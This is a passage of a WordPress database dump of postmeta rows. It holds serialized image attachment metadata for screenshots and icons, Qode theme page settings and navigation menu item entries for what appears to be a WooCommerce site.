020-04-13-at-16.25.00-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-672x550.png\";s:5:\"width\";i:672;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-550x802.png\";s:5:\"width\";i:550;s:6:\"height\";i:802;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-600x716.png\";s:5:\"width\";i:600;s:6:\"height\";i:716;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-600x716.png\";s:5:\"width\";i:600;s:6:\"height\";i:716;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.00-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13359,5170,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.25.16.png'),(13360,5170,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:360;s:6:\"height\";i:492;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.25.16.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.16-220x300.png\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.16-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.16-360x300.png\";s:5:\"width\";i:360;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.16-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.16-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.16-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.16-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.16-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13361,5171,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.25.24.png'),(13362,5171,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:360;s:6:\"height\";i:492;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.25.24.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.24-220x300.png\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.24-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.24-360x300.png\";s:5:\"width\";i:360;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.24-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.24-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.24-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.24-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.24-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13363,5172,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.25.42.png'),(13364,5172,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:710;s:6:\"height\";i:812;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.25.42.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-262x300.png\";s:5:\"width\";i:262;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-710x550.png\";s:5:\"width\";i:710;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-550x812.png\";s:5:\"width\";i:550;s:6:\"height\";i:812;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-600x686.png\";s:5:\"width\";i:600;s:6:\"height\";i:686;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-600x686.png\";s:5:\"width\";i:600;s:6:\"height\";i:686;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.42-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13365,5173,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.25.53.png'),(13366,5173,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:710;s:6:\"height\";i:812;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.25.53.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-262x300.png\";s:5:\"width\";i:262;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-710x550.png\";s:5:\"width\";i:710;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-550x812.png\";s:5:\"width\";i:550;s:6:\"height\";i:812;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-600x686.png\";s:5:\"width\";i:600;s:6:\"height\";i:686;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-600x686.png\";s:5:\"width\";i:600;s:6:\"height\";i:686;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.25.53-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13367,5174,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.26.00.png'),(13368,5174,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:710;s:6:\"height\";i:812;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.26.00.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-262x300.png\";s:5:\"width\";i:262;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-710x550.png\";s:5:\"width\";i:710;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-550x812.png\";s:5:\"width\";i:550;s:6:\"height\";i:812;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-600x686.png\";s:5:\"width\";i:600;s:6:\"height\";i:686;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-600x686.png\";s:5:\"width\";i:600;s:6:\"height\";i:686;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.00-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13369,5175,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.26.12.png'),(13370,5175,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:710;s:6:\"height\";i:812;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.26.12.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-262x300.png\";s:5:\"width\";i:262;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-710x550.png\";s:5:\"width\";i:710;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-550x812.png\";s:5:\"width\";i:550;s:6:\"height\";i:812;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-600x686.png\";s:5:\"width\";i:600;s:6:\"height\";i:686;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-600x686.png\";s:5:\"width\";i:600;s:6:\"height\";i:686;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.26.12-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13371,5176,'_wp_attached_file','2020/04/Screenshot-2020-04-13-at-16.31.31.png'),(13372,5176,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:452;s:6:\"height\";i:558;s:4:\"file\";s:45:\"2020/04/Screenshot-2020-04-13-at-16.31.31.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-243x300.png\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-452x300.png\";s:5:\"width\";i:452;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-452x550.png\";s:5:\"width\";i:452;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-452x550.png\";s:5:\"width\";i:452;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Screenshot-2020-04-13-at-16.31.31-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13373,5145,'_edit_last','1'),(13374,5145,'qodef_page_content_behind_header_meta','no'),(13375,5145,'qodef_boxed_background_image_attachment_meta','fixed'),(13376,5145,'qodef_disable_vertical_header_background_image_meta','no'),(13377,5145,'qodef_disable_header_widget_logo_area_meta','no'),(13378,5145,'qodef_disable_header_widget_menu_area_meta','no'),(13379,5145,'slide_template','default'),(13380,5145,'rs_page_bg_color','#ffffff'),(14209,5435,'qodef_boxed_background_image_attachment_meta','fixed'),(14208,5435,'qodef_page_content_behind_header_meta','no'),(14207,5435,'_edit_last','1'),(14206,5435,'_edit_lock','1693463366:1'),(14205,5435,'_thumbnail_id','5141'),(14204,5435,'_wp_old_date','2020-04-13'),(13390,5181,'_menu_item_type','post_type'),(13391,5181,'_menu_item_menu_item_parent','0'),(13392,5181,'_menu_item_object_id','5145'),(13393,5181,'_menu_item_object','page'),(13394,5181,'_menu_item_target',''),(13395,5181,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13396,5181,'_menu_item_xfn',''),(13397,5181,'_menu_item_url',''),(13419,5188,'_menu_item_type','post_type'),(13420,5188,'_menu_item_menu_item_parent','0'),(13421,5188,'_menu_item_object_id','5145'),(13422,5188,'_menu_item_object','page'),(13423,5188,'_menu_item_target',''),(13424,5188,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13425,5188,'_menu_item_xfn',''),(13426,5188,'_menu_item_url',''),(13455,4863,'qodef_title_area_background_color_meta','#ffb69b'),(13456,5189,'_menu_item_type','post_type'),(13457,5189,'_menu_item_menu_item_parent','0'),(13458,5189,'_menu_item_object_id','5145'),(13459,5189,'_menu_item_object','page'),(13460,5189,'_menu_item_target',''),(13461,5189,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13462,5189,'_menu_item_xfn',''),(13463,5189,'_menu_item_url',''),(13465,5190,'_wp_attached_file','2020/04/facebook-e1587088793184.png'),(13466,5190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:50;s:6:\"height\";i:50;s:4:\"file\";s:35:\"2020/04/facebook-e1587088793184.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"facebook-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"facebook-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"facebook-512x300.png\";s:5:\"width\";i:512;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"facebook-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"facebook-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"facebook-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"facebook-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"facebook-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9